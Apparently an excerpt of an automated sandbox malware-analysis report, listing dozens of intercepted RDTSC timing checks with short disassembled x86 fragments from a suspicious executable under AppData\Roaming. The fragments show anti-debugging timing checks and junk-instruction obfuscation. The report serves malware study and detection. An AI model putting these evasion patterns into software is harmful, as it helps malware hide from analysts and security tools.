                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F80ECD second address: F80EED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jo 00007F91E8D54016h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F91E8D54021h 0x00000014 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F81F24 second address: F81F28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F81FA9 second address: F81FC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91E8D5401Dh 0x00000008 jne 00007F91E8D54016h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F81FC8 second address: F81FCC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F82EBE second address: F82EC2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F83DE8 second address: F83DF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007F91E851B8D6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F83DF2 second address: F83DF6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F85CDC second address: F85CE1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F86E35 second address: F86E3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F86E3B second address: F86E3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F86E3F second address: F86E79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 push 00000000h 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007F91E8D54018h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 mov di, si 0x00000028 push 00000000h 0x0000002a mov di, cx 0x0000002d push eax 0x0000002e push eax 0x0000002f push edx 0x00000030 pushad 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F86E79 second address: F86E80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F88EB2 second address: F88EE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F91E8D54028h 0x0000000f pushad 0x00000010 jmp 00007F91E8D54022h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F88EE9 second address: F88F71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 and ebx, 5E44FA9Bh 0x0000000d mov bx, si 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push edx 0x00000015 call 00007F91E851B8D8h 0x0000001a pop edx 0x0000001b mov dword ptr [esp+04h], edx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc edx 0x00000028 push edx 0x00000029 ret 0x0000002a pop edx 0x0000002b ret 0x0000002c movsx edi, ax 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ecx 0x00000034 call 00007F91E851B8D8h 0x00000039 pop ecx 0x0000003a mov dword ptr [esp+04h], ecx 0x0000003e add dword ptr [esp+04h], 0000001Ah 0x00000046 inc ecx 0x00000047 push ecx 0x00000048 ret 0x00000049 pop ecx 0x0000004a ret 0x0000004b or ebx, dword ptr [ebp+138A0215h] 0x00000051 mov ebx, dword ptr [ebp+13712C19h] 0x00000057 xchg eax, esi 0x00000058 jnp 00007F91E851B8DEh 0x0000005e push eax 0x0000005f pushad 0x00000060 pushad 0x00000061 ja 00007F91E851B8D6h 0x00000067 push edx 0x00000068 pop edx 0x00000069 popad 0x0000006a push eax 0x0000006b push edx 0x0000006c jp 00007F91E851B8D6h 0x00000072 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8AECB second address: F8AEF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F91E8D5401Ch 0x00000008 jmp 00007F91E8D54022h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8AEF6 second address: F8AEFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8AEFA second address: F8AF00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8AF00 second address: F8AF8F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8DDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push 00000000h 0x0000000e push ebx 0x0000000f call 00007F91E851B8D8h 0x00000014 pop ebx 0x00000015 mov dword ptr [esp+04h], ebx 0x00000019 add dword ptr [esp+04h], 0000001Bh 0x00000021 inc ebx 0x00000022 push ebx 0x00000023 ret 0x00000024 pop ebx 0x00000025 ret 0x00000026 or ebx, dword ptr [ebp+13712979h] 0x0000002c call 00007F91E851B8E8h 0x00000031 mov edi, esi 0x00000033 pop ebx 0x00000034 push 00000000h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F91E851B8D8h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Bh 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 xchg eax, esi 0x00000051 push ebx 0x00000052 push edi 0x00000053 jno 00007F91E851B8D6h 0x00000059 pop edi 0x0000005a pop ebx 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 pushad 0x00000061 popad 0x00000062 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8AF8F second address: F8AF95 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8AF95 second address: F8AF9F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F91E851B8D6h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8BEDF second address: F8BEF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jg 00007F91E8D5401Ch 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8CFC3 second address: F8CFD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a jmp 00007F91E851B8DBh 0x0000000f pop ecx 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8CFD9 second address: F8CFDE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8CFDE second address: F8D044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F91E851B8D6h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d nop 0x0000000e push 00000000h 0x00000010 push ebx 0x00000011 call 00007F91E851B8D8h 0x00000016 pop ebx 0x00000017 mov dword ptr [esp+04h], ebx 0x0000001b add dword ptr [esp+04h], 00000019h 0x00000023 inc ebx 0x00000024 push ebx 0x00000025 ret 0x00000026 pop ebx 0x00000027 ret 0x00000028 movsx edi, cx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push edx 0x00000030 call 00007F91E851B8D8h 0x00000035 pop edx 0x00000036 mov dword ptr [esp+04h], edx 0x0000003a add dword ptr [esp+04h], 00000014h 0x00000042 inc edx 0x00000043 push edx 0x00000044 ret 0x00000045 pop edx 0x00000046 ret 0x00000047 push 00000000h 0x00000049 mov ebx, dword ptr [ebp+13712939h] 0x0000004f mov bx, 31B4h 0x00000053 xchg eax, esi 0x00000054 pushad 0x00000055 js 00007F91E851B8DCh 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8D044 second address: F8D04B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8DF17 second address: F8DF37 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jo 00007F91E851B8E5h 0x00000011 jmp 00007F91E851B8DFh 0x00000016 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8F08F second address: F8F095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8F095 second address: F8F099 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8F099 second address: F8F123 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov dword ptr [ebp+1371398Bh], edi 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push ebx 0x00000014 call 00007F91E8D54018h 0x00000019 pop ebx 0x0000001a mov dword ptr [esp+04h], ebx 0x0000001e add dword ptr [esp+04h], 0000001Ch 0x00000026 inc ebx 0x00000027 push ebx 0x00000028 ret 0x00000029 pop ebx 0x0000002a ret 0x0000002b call 00007F91E8D54026h 0x00000030 mov di, si 0x00000033 pop ebx 0x00000034 movsx ebx, di 0x00000037 push 00000000h 0x00000039 call 00007F91E8D5401Fh 0x0000003e mov ebx, 7477CFF3h 0x00000043 pop edi 0x00000044 push eax 0x00000045 pushad 0x00000046 jmp 00007F91E8D54027h 0x0000004b jbe 00007F91E8D5401Ch 0x00000051 push eax 0x00000052 push edx 0x00000053 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F92C1B second address: F92C1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F92C1F second address: F92C23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F92C23 second address: F92C41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F91E851B8E2h 0x00000011 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F92C41 second address: F92C47 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F775AB second address: F775C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F775C6 second address: F775D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F91E8D54016h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F78B0B second address: F78B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7ABD0 second address: F7ABD9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F7ABD9 second address: F7AC00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a jmp 00007F91E851B8E9h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F80165 second address: F8016B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F81087 second address: F8108B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8108B second address: F810A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E8D54025h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F83FEE second address: F83FF4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F86F9B second address: F86F9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F86F9F second address: F87044 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F91E851B8E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov dword ptr [esp], eax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push edx 0x00000017 call 00007F91E851B8D8h 0x0000001c pop edx 0x0000001d mov dword ptr [esp+04h], edx 0x00000021 add dword ptr [esp+04h], 0000001Bh 0x00000029 inc edx 0x0000002a push edx 0x0000002b ret 0x0000002c pop edx 0x0000002d ret 0x0000002e pushad 0x0000002f sub edi, 431B6990h 0x00000035 popad 0x00000036 and bx, 70F8h 0x0000003b mov dword ptr fs:[00000000h], esp 0x00000042 pushad 0x00000043 mov si, di 0x00000046 pushad 0x00000047 mov ebx, dword ptr [ebp+13712CE4h] 0x0000004d xor di, 2941h 0x00000052 popad 0x00000053 popad 0x00000054 mov edi, dword ptr [ebp+13712C35h] 0x0000005a mov eax, dword ptr [ebp+1371081Dh] 0x00000060 cld 0x00000061 push FFFFFFFFh 0x00000063 nop 0x00000064 jne 00007F91E851B8E0h 0x0000006a push eax 0x0000006b push eax 0x0000006c push edx 0x0000006d jmp 00007F91E851B8E6h 0x00000072 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8908B second address: F89091 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8915E second address: F89168 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F91E851B8D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F89168 second address: F8916D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8A090 second address: F8A094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8A145 second address: F8A149 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8E1D3 second address: F8E1D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8E1D7 second address: F8E1DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F8E1DD second address: F8E1E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F880A1 second address: F880A6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F88136 second address: F88141 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F91E851B8D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F96FEE second address: F96FFD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jc 00007F91E8D54016h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F96FFD second address: F97001 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F96B26 second address: F96B3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F91E8D54020h 0x0000000d rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA0983 second address: FA098A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA098A second address: FA0990 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA0990 second address: FA09A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F91E851B8DFh 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA09A8 second address: FA09BA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007F91E8D5401Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA09BA second address: FA09C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 jg 00007F91E851B8D6h 0x0000000b pop ebx 0x0000000c rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA0AF4 second address: FA0B03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jnc 00007F91E8D54016h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA0B03 second address: FA0B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA0C47 second address: FA0C92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E8D54025h 0x00000009 pop esi 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnc 00007F91E8D5401Ch 0x00000013 pushad 0x00000014 jp 00007F91E8D54016h 0x0000001a push ecx 0x0000001b pop ecx 0x0000001c jmp 00007F91E8D54027h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA0C92 second address: FA0C97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA0EEE second address: FA0EF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F91E8D54016h 0x0000000a rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA0EF8 second address: FA0F08 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F91E851B8D6h 0x00000008 je 00007F91E851B8D6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA464A second address: FA4662 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F91E8D54024h 0x00000009 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA4662 second address: FA4666 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: FA4666 second address: FA466C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6F66F second address: F6F675 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6F675 second address: F6F683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6F683 second address: F6F687 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6F73D second address: F6F741 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6F741 second address: F6F7F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebx 0x0000000a pushad 0x0000000b jmp 00007F91E851B8E8h 0x00000010 xor dword ptr [ebp+13712FB2h], ebx 0x00000016 popad 0x00000017 push dword ptr fs:[00000000h] 0x0000001e and edi, dword ptr [ebp+13712951h] 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b and edi, dword ptr [ebp+13712BC5h] 0x00000031 mov dword ptr [ebp+138C4489h], esp 0x00000037 pushad 0x00000038 jmp 00007F91E851B8E4h 0x0000003d mov ax, dx 0x00000040 popad 0x00000041 cmp dword ptr [ebp+13712999h], 00000000h 0x00000048 jne 00007F91E851B9AEh 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 call 00007F91E851B8D8h 0x00000056 pop eax 0x00000057 mov dword ptr [esp+04h], eax 0x0000005b add dword ptr [esp+04h], 0000001Ch 0x00000063 inc eax 0x00000064 push eax 0x00000065 ret 0x00000066 pop eax 0x00000067 ret 0x00000068 mov byte ptr [ebp+1371395Eh], 00000047h 0x0000006f mov dword ptr [ebp+13895913h], edx 0x00000075 mov eax, D49AA7D2h 0x0000007a sub di, B732h 0x0000007f push eax 0x00000080 push ecx 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 rdtsc
                          Source: C:\Users\user\AppData\RoamingCBGCBGCAFI.exeRDTSC instruction interceptor: First address: F6F7F2 second address: F6F7F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
